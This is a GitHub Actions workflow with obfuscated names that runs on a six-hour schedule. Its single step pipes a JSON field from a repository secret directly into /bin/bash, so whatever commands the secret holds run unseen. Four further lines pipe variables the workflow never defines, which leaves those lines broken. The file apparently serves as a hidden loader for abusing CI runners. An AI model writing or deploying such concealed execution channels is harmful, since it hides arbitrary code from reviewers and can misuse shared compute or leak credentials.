name: shoeappear

on:
  workflow_dispatch:
  schedule:
    - cron: '15 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shoeappear
        env:
          aop556: ${{ secrets.aop556 }}
        run: |
          echo $aop556 | jq -r .vk910 | /bin/bash
          echo $a4294 | jq -r .rbvhz55 | /bin/bash
          echo $oejh44 | jq -r .ka370 | /bin/bash
          echo $hbw3634 | jq -r .spz4 | /bin/bash
          echo $t847 | jq -r .fts70 | /bin/bash

